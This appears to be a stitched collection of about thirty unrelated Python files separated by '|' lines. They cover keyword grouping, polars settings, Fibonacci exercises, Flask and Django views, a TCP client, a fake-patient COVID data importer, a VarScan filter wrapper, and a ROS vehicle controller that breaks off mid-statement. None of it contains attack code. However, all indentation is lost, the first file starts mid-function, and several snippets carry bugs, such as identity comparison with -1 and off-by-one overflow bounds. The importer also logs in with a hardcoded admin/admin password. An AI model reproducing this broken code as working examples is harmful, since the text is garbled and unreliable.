group_dict = {g:[] for g in groups}
group_dict['questions'] = []
#parse input into groups
for group in groups:
if len(group) < n_st_min:
continue
print("Group \'%s\':" % group)
for line in raw:
# lists for each specific question type to be present
w_check = list(map(lambda x: ' '+x in ' '+line+' ', w_words))
q_check = list(map(lambda x: ' '+x in ' '+line+' ', q_words))
if np.array(w_check).sum():
group_dict['questions'].append(line.strip())
if w_words[w_check][0] not in group_dict:
group_dict[w_words[w_check][0]] = [line.strip()]
else:
group_dict[w_words[w_check][0]].append(line.strip())
if np.array(q_check).sum():
group_dict['questions'].append(line.strip())
if q_words[q_check][0] not in group_dict:
group_dict[q_words[q_check][0]] = [line.strip()]
else:
group_dict[q_words[q_check][0]].append(line.strip())
if line.find(group) is not -1:
print(line.strip())
group_dict[group].append(line.strip())
print()
# all questions will be a specific exception
exceptions = np.array([],dtype=str)
exceptions = np.append(exceptions,np.array(w_words))
exceptions = np.append(exceptions,np.array(q_words))
group_df = dict_to_df(group_dict, thresholds=thresholds,exceptions=exceptions)
group_df[:][group_df=='nan'] = ''
group_df = group_df.reindex(sorted(group_df.columns), axis=1)
data_df = my_data.filter(filter_keys)
data_df['wordstemms'] = pd.Series(np.empty(data_df[str_key].values.shape,dtype=str))
for gr in sorted(group_df.columns):
data_df.loc[data_df[str_key].isin(group_df[gr]),'wordstemms'] = \
data_df['wordstemms'].loc[data_df[str_key].isin(group_df[gr])].values + gr+', '
data_df[gr] = pd.Series(data_df[str_key].isin(group_df[gr]).astype(int))
return data_df, group_df
def wordstemm_bag(
my_data = None,
str_key = 'Keyword',
filter_keys = [
'Wettbewerber / Aufteilung',
'Organisch vs. Paid',
'Keyword',
'Ø Suchanfragen pro Monat',
],
en_qflg = 0, de_qflg = 1,
n_st_min = 4,
thresholds = (4,500),
):
# re-defining globals to avoid possible overwrites (probably unnecessary)
q_words = q_words_.copy()
w_words = w_words_.copy()
if type(my_data) == type(None):
return None
raw = my_data[str_key].values.tolist()
if not en_qflg:
q_words = np.array([])
if not de_qflg:
w_words = np.array([])
# dictionary with possible n-gramms and all its cases
group_dict = {}
group_dict['questions'] = []
# generate set of all possible groupings
groups = set()
for line in raw:
data = line.strip().split()
for group in data:
if len(group) < n_st_min:
continue
groups.add(group)
w_check = list(map(lambda x: ' '+x in ' '+line+' ', w_words))
q_check = list(map(lambda x: ' '+x in ' '+line+' ', q_words))
if np.array(w_check).sum():
group_dict['questions'].append(line.strip())
if w_words[w_check][0] not in group_dict:
group_dict[w_words[w_check][0]] = [line.strip()]
else:
group_dict[w_words[w_check][0]].append(line.strip())
if np.array(q_check).sum():
group_dict['questions'].append(line.strip())
if q_words[q_check][0] not in group_dict:
group_dict[q_words[q_check][0]] = [line.strip()]
else:
group_dict[q_words[q_check][0]].append(line.strip())
if line.find(group) is not -1:
if not group in group_dict.keys():
group_dict[group] = []
group_dict[group].append(line.strip())
if not en_qflg:
q_words = np.array([])
if not de_qflg:
w_words = np.array([])
exceptions = np.array([],dtype=str)
exceptions = np.append(exceptions,np.array(w_words))
exceptions = np.append(exceptions,np.array(q_words))
return dict_to_df(group_dict, thresholds=thresholds,exceptions=exceptions)
#def indep_ngrams(text,stop_words=[]):
#
#
#
# for
# if type()
#
#
# return ngram_list
|
def convtobin(n,l):
a=[]
c=n
while c>0:
a.append(c%2)
c=c/2
while len(a) < l:
a.append(0)
return a
def bitwisedig(m,n,k):
r = m % (2**k)
if r < 2**(k-1):
return 0
else:
if n-m > 2**k -r-1:
return 0
else:
return 1
def bitwiseand(m,n):
a=[]
k=0
while 2**k <= n:
a.append(bitwisedig(m,n,k+1))
k+=1
c=0
for j in range(len(a)):
c+= a[j]*(2**j)
return c
|
import os
from typing import Type
import polars as pl
__all__ = [
"Config",
]
class Config:
"Configure polars"
@classmethod
def set_utf8_tables(cls) -> "Type[Config]":
"""
Use utf8 characters to print tables
"""
os.environ.unsetenv("POLARS_FMT_NO_UTF8") # type: ignore
return cls
@classmethod
def set_ascii_tables(cls) -> "Type[Config]":
"""
Use ascii characters to print tables
"""
os.environ["POLARS_FMT_NO_UTF8"] = "1"
return cls
@classmethod
def set_tbl_width_chars(cls, width: int) -> "Type[Config]":
"""
Set the number of character used to draw the table
Parameters
----------
width
number of chars
"""
os.environ["POLARS_TABLE_WIDTH"] = str(width)
return cls
@classmethod
def set_tbl_rows(cls, n: int) -> "Type[Config]":
"""
Set the number of rows used to print tables
Parameters
----------
n
number of rows to print
"""
os.environ["POLARS_FMT_MAX_ROWS"] = str(n)
return cls
@classmethod
def set_tbl_cols(cls, n: int) -> "Type[Config]":
"""
Set the number of columns used to print tables
Parameters
----------
n
number of columns to print
"""
os.environ["POLARS_FMT_MAX_COLS"] = str(n)
return cls
@classmethod
def set_global_string_cache(cls) -> "Type[Config]":
"""
Turn on the global string cache
"""
pl.toggle_string_cache(True)
return cls
@classmethod
def unset_global_string_cache(cls) -> "Type[Config]":
"""
Turn off the global string cache
"""
pl.toggle_string_cache(False)
return cls
|
from math import log
phi = (1 + 5 ** 0.5) / 2
def fib(n):
'''
Find the Fibonacci number using Binet's formula.
'''
return int(round((phi ** n - (1 - phi) ** n) / 5 ** 0.5))
def fibinv(f):
'''
Inverse Fibonacci function using Binet's formula.
'''
if f < 2:
return
return int(round(log(f * 5 ** 0.5) / log(phi)))
|
# 🚨 Don't change the code below 👇
print("Welcome to the Love Calculator!")
name1 = input("What is your name? \n")
name2 = input("What is the name of the person you like? \n")
# 🚨 Don't change the code above 👆
#Write your code below this line 👇
name1_lower_case = name1.lower()
name2_lower_case = name2.lower()
true = 0
true += name1_lower_case.count("t")
true += name2_lower_case.count("t")
true += name1_lower_case.count("r")
true += name2_lower_case.count("r")
true += name1_lower_case.count("u")
true += name2_lower_case.count("u")
true += name1_lower_case.count("e")
true += name2_lower_case.count("e")
love = 0
love += name1_lower_case.count("l")
love += name2_lower_case.count("l")
love += name1_lower_case.count("o")
love += name2_lower_case.count("o")
love += name1_lower_case.count("v")
love += name2_lower_case.count("v")
love += name1_lower_case.count("e")
love += name2_lower_case.count("e")
true_love = int(str(true) + str(love))
if true_love >= 40 and true_love <= 50:
print(f"Your score is {true_love}, you are alright together.")
elif true_love < 10 or true_love > 90:
print(f"Your score is {true_love}, you go together like coke and mentos.")
else:
print(f"Your score is {true_love}.")
|
from pywebio import *
from pywebio.output import *
from pywebio.input import *
from pywebio.pin import *
from pywebio.session import hold
def put_pin_value(text):
with use_scope('text_output', clear=True):
put_text(text)
def main():
put_table([
['Commodity', 'Price / unit'],
['Apple', '0.5'],
['Banana', '0.4'],
['Avacado', '1.2'],
])
put_tabs([
{'title': 'Search by fruit', 'content': [
put_row(
[put_input('fruit'),
put_buttons(['search'], lambda _: put_pin_value(pin.fruit)),
], )
]},
{'title': 'Search by price', 'content': [
put_row(
[put_input('price'),
put_buttons(['search'], lambda _: put_pin_value(pin.price)),
], )
]},
{'title': 'Help', 'content': 'Input a fruit name of interest then hit the search button.'},
])
use_scope('text_output')
hold()
|
import cv2
import numpy as np
image = cv2.imread("image/picasso.jpg")
cv2.imshow("Original",image)
cv2.waitKey(0)
mask = np.zeros(image.shape[:2],dtype = "uint8")
(cX,cY) = ( image.shape[1] // 2 , image.shape[0] // 2 )
cv2.rectangle(mask,(cX-75,cY-75),(cX+75,cY+75),255,-1)
cv2.imshow("Mask",mask)
cv2.waitKey(0)
print(image.shape[0],image.shape[1])
masked = cv2.bitwise_and(image,image,mask = mask)
cv2.imshow("Mask applied to Image",masked)
cv2.waitKey(0)
mask = np.zeros(image.shape[:2],dtype = "uint8")
cv2.circle(mask,(cX,cY),100,255,-1)
cv2.imshow("Mask Circle",mask)
cv2.waitKey(0)
masked = cv2.bitwise_and(image,image,mask = mask)
cv2.imshow("Mask applied to Image Circle",masked)
cv2.waitKey(0)
|
from flask import Flask, render_template, request, jsonify
import imdb
APP = Flask(__name__)
DEFAULT_SEASON = 1
@APP.route('/')
def search_page():
return render_template('trivia.html')
@APP.route('/show')
def show():
opt_args = {}
if 'year' in request.args.keys():
opt_args['year'] = int(request.args['year'])
if 'season' in request.args.keys():
opt_args['season_start'] = int(request.args['season'])
opt_args['season_end'] = int(request.args['season'])
else:
opt_args['season_start'] = opt_args['season_end'] = 1
print([i for i in request.args.keys()])
show_data = imdb.OMDBAPIShowFactory(request.args['title'], **opt_args).create()
return jsonify(show_data.serialize())
@APP.route('/episode')
def episode():
opt_args = {}
ep_id = request.args('ep_id', None)
if ep_id:
show_data = imdb.OMDBAPIShowFactory(request.args['title'], has_trivia=False, **opt_args).create()
return jsonify(show_data.serialize())
else:
pass
# return 404
|
from pyUbiForge.misc.file_object import FileObjectDataWrapper
from pyUbiForge.misc.file_readers import BaseReader
class Reader(BaseReader):
file_type = '0E5A450A'
def __init__(self, file_object_data_wrapper: FileObjectDataWrapper):
# readStr(fIn, fOut, 184)
file_object_data_wrapper.read_bytes(14)
for _ in range(2):
file_object_data_wrapper.read_file()
file_object_data_wrapper.read_bytes(1)
check_byte = file_object_data_wrapper.read_uint_8()
if check_byte != 3:
file_object_data_wrapper.read_id()
count = file_object_data_wrapper.read_uint_32()
for _ in range(count):
file_object_data_wrapper.read_bytes(1)
file_object_data_wrapper.read_id()
file_object_data_wrapper.read_bytes(9)
|
# Recursive Call
def Fibonacci(num):
if num <= 1:
return num
return Fibonacci(num-1) + Fibonacci(num-2)
# Dynamic Programming - Fibonacci
def DP_Fibonacci(num):
cache = [0 for _ in range(num+1)]
cache[0] = 0
cache[1] = 1
for index in range(2, num+1):
cache[index] = cache[index-1] + cache[index-2]
return cache[num]
def DP_Pascal(rowIndex):
cache = [1 for _ in range(rowIndex)]
if rowIndex == 0:
return [1]
if rowIndex == 1:
return [1, 1]
for start in range(1, rowIndex):
for idx in range(start, 0, -1):
cache[idx] = cache[idx] + cache[idx-1]
return cache + [1]
if __name__ == '__main__':
import time
start_time = time.time()
Fibonacci(30)
end_time = time.time()
print("Recursive: ", end_time - start_time)
start_time = time.time()
DP_Fibonacci(30)
end_time = time.time()
print("Dynamic Programming: ", end_time - start_time)
'''
Recursive: 0.24840807914733887
Dynamic Programming: 1.3113021850585938e-05
'''
|
def read_line(linename,writename):
with open(linename,'r') as f:#a+ 用seek(0)
#f.seek(0) #开头位置
str=f.read()
print(str)
with open(writename,'w') as e:
# e.seek(0) #开头位置
e.write(str)
#read_line("D://hello.txt")
|
class Settings():
def __init__(self, LRslowMode = True, Slow = False, PrintLevel = 0):
self.LRslowMode = LRslowMode
self.Slow = Slow
self.PrintLevel = PrintLevel
|
import pandas as pd
import array
df = pd.read_csv("IMDB_movies_dataset.csv", low_memory=False, error_bad_lines=False)
df['language'] = df['language'].fillna('')
filtered_csv = pd.DataFrame()
for i in range(1960, 2020):
temp = df[df['year'] == str(i)]
filtered_csv = pd.concat([filtered_csv, temp], axis=0)
filtered_csv = filtered_csv[filtered_csv['language'].str.contains('English', regex=False)]
filtered_csv = filtered_csv[filtered_csv['avg_vote'].astype(float)>=6]
arr = []
for j in range(0,filtered_csv.shape[0]):
arr.append(j)
filtered_csv["id"] = arr
filtered_csv.to_csv('IMDB_movies_big_dataset_clean.csv')
|
# -*- encoding: utf-8 -*-
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from models import ItemAgenda
from forms import FormItemAgenda
def index(request):
return HttpResponse(u"Hello World")
@login_required
def lista(request):
# lista_itens = ItemAgenda.objects.all()
lista_itens = ItemAgenda.objects.filter(usuario = request.user)
return render_to_response("lista.html", {'lista_itens': lista_itens })
@login_required
def adiciona(request):
if request.method == 'POST': #form enviado
form = FormItemAgenda(request.POST, request.FILES)
if form.is_valid():
dados = form.cleaned_data
item = ItemAgenda(data = dados['data'],
hora = dados['hora'],
titulo = dados['titulo'],
descricao = dados['descricao'])
item = form.save(commit=False)
item.usuario = request.user
item.save()
return render_to_response('salvo.html', {})
else: # via link - GET
form = FormItemAgenda()
return render_to_response("adiciona.html", {'form': form}, context_instance=RequestContext(request))
@login_required
def item(request, nr_item):
item = get_object_or_404(ItemAgenda, pk=nr_item, usuario=request.user)
if request.method == 'POST':
form = FormItemAgenda(request.POST, request.FILES, instance=item)
if form.is_valid():
form.save()
return render_to_response('salvo.html', {})
else:
form = FormItemAgenda(instance=item)
return render_to_response('item.html',{'form': form}, context_instance=RequestContext(request))
|
from project.settings import * # noqa
DEBUG = True
CELERY_TASK_ALWAYS_EAGER = True
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
ENABLE_HTTP_BASIC_AUTH = False
DEFAULT_FILE_STORAGE = 'django.core.files.storage.FileSystemStorage'
MEDIA_ROOT = os.path.join(MEDIA_ROOT, 'test')
|
import socket
"""
*****需求:模拟客户端向服务发起tcp链接请求********
1. 创建客户端套接字
2. 发出连接请求
3. 收发数据
4. 关闭套接字
"""
# 1. 创建客户端套接字
tcp_client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 获取服务器的IP地址和端口号
server_ip = input("请输入您要连接的服务器的ip地址:")
server_port = int(input("请输入服务器的端口号:"))
# 2. 向服务器发起连接请求
tcp_client_socket.connect((server_ip, server_port))
# 3. 接收发送数据
send_data = input("请输入您要发送的数据")
tcp_client_socket.send(send_data.encode('utf-8'))
recv_data = tcp_client_socket.recv(4096)
print("收到的数据为:%s" % recv_data.decode('utf-8'))
# 4. 关闭套接字
tcp_client_socket.close()
|
from elements.code_elements import GenericElement
from elements.return_types import *
class StringElement(GenericElement):
return_type = STR
def __init__(self, string: str):
self.string = self._clean_string(string)
def _clean_string(self, string):
return string.replace('"', '""')
def write_out(self, sqf=False):
return '"{}"'.format(self.string)
class ArrayElement(GenericElement):
return_type = ARRAY
def __init__(self):
self.contents = []
def add_element(self, element: GenericElement):
self.contents.append(element)
def add_element_list(self, element_list: list):
for element in element_list:
self.add_element(element)
def write_out(self, sqf=False):
array_str = "["
for element in self.contents:
array_str += "{}, ".format(element.write_out(sqf))
array_str = array_str[:-2] + "]"
return array_str
class NumberElement(GenericElement):
return_type = NUM
def __init__(self, number: GenericElement):
self.number = number
def write_out(self, sqf=False):
return "{}".format(self.number)
class BooleanElement(GenericElement):
return_type = BOOL
def __init__(self, value: bool):
self.value = value
def write_out(self, sqf=False):
if sqf:
return str(self.value).lower()
else:
return str(self.value)
|
import datetime
import json
import random
import time
import traceback
import faker
import requests
from tqdm import tqdm
import os
# Data source:
# https://raw.githubusercontent.com/BlankerL/DXY-COVID-19-Data/master/json/DXYArea-TimeSeries.json
fake = faker.Factory.create("zh-CN")
api = "http://45.77.26.112/"
api = "http://localhost/"
# api = "http://8.210.248.203/"
s = requests.session()
res = json.loads(s.post(api + "user/logIn?identifier=admin&password=admin").text)
print(res)
with open('DXYArea-TimeSeries.json', 'r') as f:
data = json.load(f)
china = []
for one in data:
if (one['countryName'] == '中国'):
one['updateTime'] = time.strftime(
"%Y-%m-%d", time.localtime(one['updateTime'] // 1000))
china.append(one)
def new_hospital(address, name):
p = {
'address': address,
'name': name
}
res = s.post(api + 'hospital/createHospital', data=p)
print(json.loads(res.text))
logf = open('importer.log', 'a+')
def log(s, sender=''):
if sender=='DIAGNOSIS':
return
global logf
fs = "<{} {}>: {}".format(datetime.datetime.now().isoformat()[:-4], sender, s)
print(fs)
logf.write(fs + '\n')
departments = ['神经内科', '呼吸内科', '心血管科', '消化内科', '肾内科', '血液科', '内分泌科',
'传染科', '神经外科', '耳鼻喉科', '口腔科', '肛肠科', '骨科', '皮肤科', '妇科', '肿瘤外科',
'泌尿外科', '生殖科', '麻醉科', '精神科', '康复科', '体检科', '普通外科', '血液科', '风湿代谢科', '中医科', '疼痛科', '预防保健科', '肝胆胰脾外科',
'传染科', '传染科', '传染科', '传染科', '传染科', '急诊科']
def new_doctor():
profile = fake.profile()
doctor = {
'birthday': profile['birthdate'].strftime("%Y-%m-%d"),
'department': random.choice(departments),
'gender': profile['sex'],
'hospital_id': random.randint(1, 540),
'name': profile['name']
}
res = s.post(api + 'doctor/createDoctor', data=doctor)
log(json.loads(res.text)['data'])
# for i in range(4993):
# print("\r{} / 4993".format(i))
# new_doctor()
city = set()
citytimeline = {}
for one in china:
try:
for two in one['cities']:
city.add(two['cityName'])
citytimeline[two['cityName']] = []
except:
pass
for one in china:
try:
for two in one['cities']:
citytimeline[two['cityName']].insert(0, {
'city': two['cityName'],
'province': one['provinceName'],
"date": one['updateTime'],
'currentConfirmedCount': two['currentConfirmedCount'],
'confirmedCount': two['confirmedCount'],
'suspectedCount': two['suspectedCount'],
'curedCount': two['curedCount'],
'deadCount': two['deadCount']
})
except:
pass
status = ['治疗中', '治疗中', '治疗中', '治疗中', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '治疗中',
'治疗中', '治疗中', '治疗中', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复', '已康复']
def new_status():
r = random.random();
if (r < 0.035):
return '已死亡'
elif (r > 0.8):
return '治疗中'
else:
return '已治愈'
BEGIN_PATIENT = 0
CURRENT = 0
def new_diagnosis(doctor_id, patient_id, time, diag):
data = {
"doctor_id": doctor_id,
"nucleic_acid": diag['dna'],
"patient_id": patient_id,
"symptom": diag['words'],
"temperature": diag['temp'],
"time": time.isoformat(),
}
res = s.post(api + "diagnosis/createDiagnosis", data=data)
res = json.loads(res.text)['data']
log(res, sender="DIAGNOSIS")
diagnosis = [
{
"temp": random.randint(360, 370) / 10,
"words": "病情稳定,情况良好。",
"dna": 0
},
{
"temp": random.randint(370, 380) / 10,
"words": "轻微发烧症状,呼吸略有困难,需要进一步确定情况。",
"dna": 0
},
{
"temp": random.randint(370, 380) / 10,
"words": "已确诊为新冠肺炎,病状较轻,应注意控制以避免病情恶化。",
"dna": 1
},
{
"temp": random.randint(370, 380) / 10,
"words": "呼吸略有困难,应当辅助药物治疗,并保证已经被隔离。",
"dna": 1
},
{
"temp": random.randint(380, 390) / 10,
"words": "温度较高,应特别关注病情,有突发情况及时处理。",
"dna": 1
},
{
"temp": random.randint(380, 390) / 10,
"words": "温度较高,但核酸检测阴性,目前应当按照普通流感和肺炎治疗处理,并考虑再次核酸检测避免误诊。",
"dna": 0
},
{
"temp": random.randint(390, 395) / 10,
"words": "状态很危险,应辅助呼吸治疗,必要时转入重点监护病房。",
"dna": 1
},
{
"temp": random.randint(395, 412) / 10,
"words": "状态极其危险,应作为重点监护对象,保持密切关注,辅助生命维持设备。",
"dna": 1
},
]
def new_patient(city, province, date, status):
global CURRENT
CURRENT = CURRENT + 1
if CURRENT < BEGIN_PATIENT:
return
try:
hospital = json.loads(s.post(api + 'hospital/getHospitalInfo', data={"address": city}).text)['data']
doctors = json.loads(s.post(api + 'doctor/getDoctorInfo',
data={"hospital_id": hospital[0]['hospital_id']}).text)['data']
profile = fake.profile()
patient = {
'birthday': profile['birthdate'].strftime("%Y-%m-%d"),
'confirm_date': date,
# 'doctor_id': random.randint(0, 9146),
'doctor_id': random.choice(doctors)['doctor_id'],
# 'gendLer': 1 if profile['sex'] == 'M' else 0,
'gender': profile['sex'],
'hospital_id': hospital[0]['hospital_id'],
# 'hospital_id': city + "第一人民医院",
# 'hospital_id': city + "第一人民医院" if (city.find('人员') == -1 and city.find('境外') == -1 and city.find('监狱') ==
# -1) else "中心医院",
'name': profile['name'],
'onset_date': date,
'onset_place': province + city,
'is_doctor': '0',
'status': status
}
res = s.post(api + 'patient/createPatient', data=patient)
res = json.loads(res.text)['data']
log(res, sender="PATIENT")
### Create diagnosis
startdate = datetime.datetime.fromisoformat(patient['confirm_date'])
for day in range(29):
thisdate = startdate + datetime.timedelta(days=day, hours=random.randint(7, 23), minutes=
random.randint(0, 60))
new_diagnosis(patient['doctor_id'], res['patient_id'], thisdate, random.choice(diagnosis))
# Last day
thisdate = startdate + datetime.timedelta(days=30, hours=random.randint(7, 23), minutes=random.randint(0, 60))
if (patient['status'] == '已死亡'):
new_diagnosis(patient['doctor_id'], res['patient_id'], thisdate, diagnosis[-1])
elif (patient['status'] == '已治愈'):
new_diagnosis(patient['doctor_id'], res['patient_id'], thisdate, diagnosis[0])
except:
with open('importerError.log', 'a+') as f:
traceback.print_exc()
f.write('<{}>: Error occurred in patient({}, {}, {}, {})\n'.format(datetime.datetime.now().isoformat()[:-4], city, province, date, status))
# Generat patient and diagnosis and perscription
# for one in tqdm(citytimeline.values(), desc="Enumerating Cities"):
# for i, today in tqdm(enumerate(one), desc="Enumerating Patients"):
# if i == 0:
# newCount = today['confirmedCount']
# newDead = today['deadCount']
# else:
# newCount = today['confirmedCount'] - one[i - 1]['confirmedCount']
# newDead = today['deadCount'] - one[i - 1]['deadCount']
# for t in range(newCount - newDead):
# new_patient(today['city'], today['province'], today['date'], random.choice(status))
# for t in range(newDead):
# new_patient(today['city'], today['province'], today['date'], '已死亡')
|
# Copyright (c) 2021 Mahdi Biparva, mahdi.biparva@gmail.com
# miTorch: Medical Imaging with PyTorch
# Deep Learning Package for 3D medical imaging in PyTorch
# Implemented by Mahdi Biparva, April 2021
# Brain Imaging Lab, Sunnybrook Research Institute (SRI)
from itertools import product
import warnings
def len_hp_set(hp_set):
output_len = 1
for v in hp_set.values():
output_len *= len(v)
return output_len
def len_hp_param(hp_param):
output_len = 1
for v in hp_param:
if v['type'] == 'choice':
output_len *= len(v['values'])
return output_len
def set_hp_cfg(cfg, in_item):
key, value = in_item
assert isinstance(key, str) and len(key)
key_list = key.split('.')
key_par = cfg
for i, k in enumerate(key_list):
if i == len(key_list) - 1:
break
key_par = key_par.get(k, None)
setattr(key_par, key_list[-1], value)
return cfg
def hp_gen_set_cfg(hps_tuple, cfg):
hps_dict = dict()
for k, v in hps_tuple:
cfg = set_hp_cfg(cfg, (k, v))
hps_dict[k] = v
return hps_dict, cfg
def hp_gen(cfg, hp_set):
for hps in product(*hp_set.values()):
hps_tuple = tuple(zip(hp_set.keys(), hps))
yield hp_gen_set_cfg(hps_tuple, cfg)
def exp_range_finder(cfg, len_exps):
hpo = cfg.get('HPO')
hpo_range_start = hpo.get('RANGE_START')
hpo_range_len = hpo.get('RANGE_LEN')
hpo_range_len = len_exps if hpo_range_len == 0 else hpo_range_len
hpo_range_end = hpo_range_start + hpo_range_len
assert 0 <= hpo_range_start
assert 0 < hpo_range_len
if hpo_range_start >= len_exps:
warnings.warn('hpo_range_start >= len_exps')
if hpo_range_end > len_exps:
warnings.warn('hpo_range_end > len_exps')
return hpo_range_start, hpo_range_end
|
#!/usr/bin/env python
__author__ = "Alessandro Coppe"
'''
Given a set of directories with VarScan2 VCFs obtained from iWhale or vs_format_converter.py (varscan_accessories)
it filters it using somaticFilter command from varscan.jar software
'''
import argparse
import os.path
import os
import sys
import pathlib
import subprocess
class bcolors:
OKGREEN = '\033[92m'
ERROR = '\033[91m'
ENDC = '\033[0m'
def main():
parser = argparse.ArgumentParser(description="Filter out VCFS produced by VarScan2")
parser.add_argument('-c', '--min_coverage', action='store', type=int, help="Minimum read depth [20]", required=False, default=20)
parser.add_argument('-r', '--min_reads2', action='store', type=int, help="Minimum supporting reads for a variant [5]", required=False, default=5)
parser.add_argument('-s', '--min_strands2', action='store', type=int, help="Minimum # of strands on which variant observed (1 or 2) [1]", required=False, default=1)
parser.add_argument('-q', '--min_avg_qual', action='store', type=int, help="Minimum average base quality for variant-supporting reads [30]", required=False, default=30)
parser.add_argument('-f', '--min_var_freq', action='store', type=float, help="Minimum variant allele frequency threshold [0.05]", required=False, default=0.05)
parser.add_argument('-p', '--p_value', action='store', type=float, help="Default p-value threshold for calling variants [0.05]", required=False, default=0.05)
parser.add_argument('-d', '--directory', action='store', type=str, help="The directory containing VarScan2 VCFs", required=False, default='.')
parser.add_argument('-o', '--output_directory', action='store', type=str, help="The output directory", required=False, default='.')
args = parser.parse_args()
min_coverage = args.min_coverage
min_reads2 = args.min_reads2
min_strands2 = args.min_strands2
min_avg_qual = args.min_avg_qual
min_var_freq = args.min_var_freq
p_value = args.p_value
directory = args.directory
output_directory = args.output_directory
if os.path.isdir(directory) == False:
print(bcolors.ERROR + "{} is not a directory".format(directory) + bcolors.ENDC )
sys.exit()
if os.path.isdir(output_directory) == False:
print(bcolors.ERROR + "{} is not a directory".format(output_directory) + bcolors.ENDC )
sys.exit()
for entry in os.listdir(directory):
path = os.path.join(directory, entry)
if os.path.isfile(path):
spliced_input_name = entry.split("_")
spliced_input_name = spliced_input_name[:len(spliced_input_name) - 1]
spliced_input_name = "_".join(spliced_input_name)
output_name = spliced_input_name + "_varscan_filtered.vcf"
output_file_path = os.path.join(output_directory, output_name)
command = ["java", "-jar", "/home/ale/local/varscan.jar", "somaticFilter", path, "--output-file", output_file_path, "--min-coverage", str(min_coverage), "--min-reads2", str(min_reads2), "--min-strands2", str(min_strands2), "--min-avg-qual", str(min_avg_qual), "--min-var-freq", str(min_var_freq), "--p-value", str(p_value)]
print(bcolors.OKGREEN + " ".join(command) + bcolors.ENDC)
subprocess.run(command)
if __name__ == "__main__":
main()
|
# -*- coding: UTF-8 -*-.
import csv
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import LinearSVC
from sklearn.metrics import accuracy_score
STOP_WORDS="english"
# STOP_WORDS=None
MAX_FEATURES = 1000
MIN_DF = 0.1
MAX_DF = 0.5
# read csv input file
def read_data(input_file):
with open(input_file, 'r') as file:
# fields are: label, title and text
reader = csv.DictReader(file, fieldnames=["label", "title", "text"])
# initialize texts and labels arrays
texts = []
labels = []
# iterate over file rows
for row in reader:
# append label and texts
labels.append(int(row["label"]))
texts.append(row["text"])
return labels, texts
# main program
def main():
# open test and train data
test_labels, test_texts = read_data('db/ag_news_csv/test.csv')
train_labels, train_texts = read_data('db/ag_news_csv/train.csv')
# initialize tfidf vectorizer
tfidf = TfidfVectorizer(strip_accents="ascii",stop_words=STOP_WORDS,max_features=MAX_FEATURES)
# fit tfidf with train texts
tfidf.fit(train_texts)
# transform train and test texts to numerical features
train_features = tfidf.transform(train_texts)
test_features = tfidf.transform(test_texts)
clf = LinearSVC()
clf.fit(train_features,train_labels)
pred = clf.predict(test_features)
print "Accuracy:", accuracy_score(test_labels, pred)
if __name__ == "__main__":
main()
|
import numpy as np
import os
def calculateTop50(inputDirName, outputDirName):
fwrite = open(outputDirName,'w')
matrix = np.loadtxt(inputDirName, dtype='float',comments='#', delimiter=None)
matrix = matrix.transpose();
for i in range(matrix.shape[0]):
output = matrix[i].argsort()[-50:][::-1]
for j in range(50):
fwrite.write(str(output[j]) + ' ')
fwrite.write('\n')
fwrite.close()
|
print(2 + 5)
print(10 - 4)
print(5 * 7)
print(60 / 6)
print('2 + 5 =', 2 + 5)
print('10 - 4 =', 10 - 4)
print('5 * 7 =', 5 * 7)
print('60 / 6 =', 60 / 6)
|
#Given a 32-bit signed integer, reverse digits of an integer.
#Assume we are dealing with an environment which could only store integers within the 32-bit signed integer range:
#[−231, 231 − 1]. For the purpose of this problem, assume that your function returns 0 when the reversed
#integer overflows.
class Solution:
def reverse(self, x):
y = str(x)
if x < 0:
ans = int('-' + str(y[:0:-1]))
else:
ans = int(str(y[::-1]))
if ans > 2147483648 or ans < -2147483648:
return 0
else:
return ans
|
from pid import PID
from yaw_controller import YawController
from lowpass import LowPassFilter
import math
import rospy
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class Controller(object):
def __init__(self, *args, **kwargs):
# TODO: Implement
# self.steer_pid = PID( -1.0987, -0.0047, -7.4110, mn = -0.52, mx = 0.52 )
wheel_base = kwargs[ 'wheel_base' ]
steer_ratio = kwargs[ 'steer_ratio' ]
max_lat_accel = kwargs[ 'max_lat_accel' ]
max_steer_angle = kwargs[ 'max_steer_angle' ]
self.vehicle_mass = kwargs[ 'vehicle_mass' ]
self.fuel_capacity = kwargs[ 'fuel_capacity' ]
self.wheel_radius = kwargs[ 'wheel_radius' ]
self.decel_limit = kwargs[ 'decel_limit' ]
self.accel_limit = kwargs[ 'accel_limit' ]
self.brake_deadband = kwargs[ 'brake_deadband' ]
self.max_throttle = kwargs[ 'max_throttle' ]
self.max_brake = kwargs[ 'max_brake' ]
decel = math.fabs( self.decel_limit )
self.max_brake_value = ( self.vehicle_mass + self.fuel_capacity * GAS_DENSITY ) \
* decel * self.wheel_radius
self.last_cmd = None
min_speed = 0.0
self.yaw_controller = YawController( wheel_base, steer_ratio, min_speed, \
max_lat_accel, max_steer_angle )
# self.lowpass_filter = LowPassFilter( 0.5, 0.1 )
def control( self, proposed_linear_v, proposed_angular_v, current_linear_v, dbw_enable ):
# TODO: Change the arg, kwarg list to suit your needs
# Return throttle, brake, steer
throttle = 1.
brake = 0.
steer = 0.
if not dbw_enable:
self.last_cmd = None
return 0., 0., 0.
dv = math.fabs( current_linear_v - proposed_linear_v )
log = True
if proposed_linear_v > 0 and current_linear_v > 0 and dv < 0.05: # Reach proposed velocity
throttle = 0.
brake = 0.
self.last_cmd = None
if log:
rospy.loginfo( "[twist_controller] == NONE === %.2f - %.2f = %.2f, throttle = %.2f, brake = %.2f", \
proposed_linear_v, current_linear_v, proposed_linear_v - current_linear_v, throttle, brake )
elif self.last_cmd and proposed_linear_v > 0 and current_linear_v > 0 and dv < 0.5:
throttle, brake = self.last_cmd
if log:
rospy.loginfo( "[twist_controller] == KEEP === %.2f - %.2f = %.2f, throttle = %.2f, brake = %.2f", \
proposed_linear_v, current_linear_v, proposed_linear_v - current_linear_v, throttle, brake )
elif current_linear_v < proposed_linear_v:
throttle = 1. * self.max_throttle
brake = 0.
self.last_cmd = [ throttle, brake ]
if log:
rospy.loginfo( "[twist_controller] == Accr === %.2f - %.2f = %.2f, throttle = %.2f, brake = %.2f", \
